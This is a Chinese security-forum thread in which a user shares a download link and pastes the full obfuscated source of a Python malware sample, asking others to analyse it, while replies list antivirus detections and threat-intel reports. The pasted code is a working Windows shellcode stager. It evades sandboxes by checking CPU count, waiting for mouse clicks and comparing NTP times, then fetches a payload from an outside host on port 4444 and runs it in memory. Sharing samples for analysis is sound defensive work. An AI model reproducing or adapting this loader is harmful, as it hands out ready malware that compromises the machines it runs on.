连接网络的还混淆代码的屑

显示全部楼层 · 发表于 2023-1-31 11:46:00

本帖最后由 python无名氏于 2023-1-31 11:48 编辑

https://pan.huang1111.cn/s/5qNECl
是python源码，来自微歩
密码：infected
看见python源码竟然被8家大厂追着打，我就来兴趣了

下载后就发现代码被混淆了

，体验一下
(自己用pyinstaller打包了一下，勉强能看出来好像是从某个地址下载了某个东西)

import urllib.request, string, random, ctypes as mAHxJzWicdq
import multiprocessing
evmxlthULbS = multiprocessing.cpu_count()
if evmxlthULbS >= 2:
import win32api
aQFUxNCwybL = 0
tgmRNfq = 1
while aQFUxNCwybL < tgmRNfq:
MagMrGsgYo = win32api.GetAsyncKeyState(1)
doWGkZlBYJnn = win32api.GetAsyncKeyState(2)
if MagMrGsgYo % 2 == 1:
aQFUxNCwybL += 1
if doWGkZlBYJnn % 2 == 1:
aQFUxNCwybL += 1
if aQFUxNCwybL >= tgmRNfq:
from time import sleep
from socket import AF_INET, SOCK_DGRAM
import sys
import datetime
import time
import socket
import struct
client = socket.socket(AF_INET, SOCK_DGRAM)
client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))
msg, address = client.recvfrom( 1024 )
eYUhIkphzndAani = datetime.datetime.fromtimestamp(struct.unpack("!12I",msg)[10] - 2208988800)
sleep(10)
client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))
msg, address = client.recvfrom( 1024 )
if ((datetime.datetime.fromtimestamp((struct.unpack("!12I",msg)[10] - 2208988800)) - eYUhIkphzndAani).seconds >= 10):
def GluJZnCXCgUZb(s): return sum([ord(ch) for ch in s]) % 0x100
def LHxIigbZn():
for x in range(64):
GwSbpAA = ''.join(random.sample(string.ascii_letters + string.digits,3))
tJQmLUaohh = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
for EGMhSDb in tJQmLUaohh:
if GluJZnCXCgUZb(GwSbpAA + EGMhSDb) == 92: return GwSbpAA + EGMhSDb
def aajwhPWMiefdQN(dKWNvT, IkihHzP):
JOnTBKvMsGEXmBM = urllib.request.ProxyHandler({})
DcnWjzSGJ = urllib.request.build_opener(JOnTBKvMsGEXmBM)
urllib.request.install_opener(DcnWjzSGJ)
IYKbYEhSglo = urllib.request.Request("http://" + dKWNvT + ":" + str(IkihHzP) + "/" + LHxIigbZn(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})
try:
DFdmcXA = urllib.request.urlopen(IYKbYEhSglo)
try:
if int(DFdmcXA.info()["Content-Length"]) > 100000: return DFdmcXA.read()
else: return ''
except: return DFdmcXA.read()
except urllib.request.URLError:
return ''
def gzqdeymQkxrePds(PaBPXAGBNBIBaas):
if PaBPXAGBNBIBaas != "":
jhwIzDTcQ = bytearray(PaBPXAGBNBIBaas)
cHXsUwpV = mAHxJzWicdq.windll.kernel32.VirtualAlloc(mAHxJzWicdq.c_int(0),mAHxJzWicdq.c_int(len(jhwIzDTcQ)), mAHxJzWicdq.c_int(0x3000),mAHxJzWicdq.c_int(0x40))
euuyvvC = (mAHxJzWicdq.c_char * len(jhwIzDTcQ)).from_buffer(jhwIzDTcQ)
mAHxJzWicdq.windll.kernel32.RtlMoveMemory(mAHxJzWicdq.c_int(cHXsUwpV),euuyvvC, mAHxJzWicdq.c_int(len(jhwIzDTcQ)))
nzDcryOmiMzz = mAHxJzWicdq.windll.kernel32.CreateThread(mAHxJzWicdq.c_int(0),mAHxJzWicdq.c_int(0),mAHxJzWicdq.c_int(cHXsUwpV),mAHxJzWicdq.c_int(0),mAHxJzWicdq.c_int(0),mAHxJzWicdq.pointer(mAHxJzWicdq.c_int(0)))
mAHxJzWicdq.windll.kernel32.WaitForSingleObject(mAHxJzWicdq.c_int(nzDcryOmiMzz),mAHxJzWicdq.c_int(-1))
iJTYhKzWTG = ''
iJTYhKzWTG = aajwhPWMiefdQN("10.0.2.5", 4444)
gzqdeymQkxrePds(iJTYhKzWTG)

复制代码

我学了四年python了都从未见过如此乱的代码，有没有高人分析一下

显示全部楼层 · 发表于 2023-1-31 11:47:59

KFA HEUR:Trojan.Win32.Generic

显示全部楼层 · 发表于 2023-1-31 11:50:16

类型:木马-HEUR/QVM10.2.01D6.Malware.Gen
描述:木马是一种伪装成正常文件的恶意软件，会盗取您的帐号、密码等隐私资料。
扫描引擎:云特征引擎
文件路径:C:\Users\Downloads\virus\virus.exe
文件大小:6.18M (6,477,614 字节)
文件指纹（MD5）:bb66dd884162b0d79d410da6a45ce75c
处理建议:隔离文件

显示全部楼层 · 发表于 2023-1-31 11:53:16

kis 21.3, kill

显示全部楼层 · 发表于 2023-1-31 11:59:11

360

显示全部楼层 · 发表于 2023-1-31 12:53:59

本帖最后由熊小度于 2023-1-31 12:59 编辑

python运行啥事没有

显示全部楼层 · 发表于 2023-1-31 13:00:06

熊小度发表于 2023-1-31 12:53
python运行啥事没有

保存为py用idle跑下试试

显示全部楼层 · 发表于 2023-1-31 13:19:55

显示全部楼层 · 发表于 2023-1-31 13:32:53

wwwab 发表于 2023-1-31 13:00
保存为py用idle跑下试试

win32api库迟迟下载不下来

显示全部楼层 · 发表于 2023-1-31 13:38:57

https://s.threatbook.com/report/ ... 7b9a1765afad596152b
https://ata.360.net/report/398685738793984/static
微软、卡巴
avast、eset、360
报毒

[病毒样本] 连接网络的还混淆代码的屑

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

评分

本帖子中包含更多资源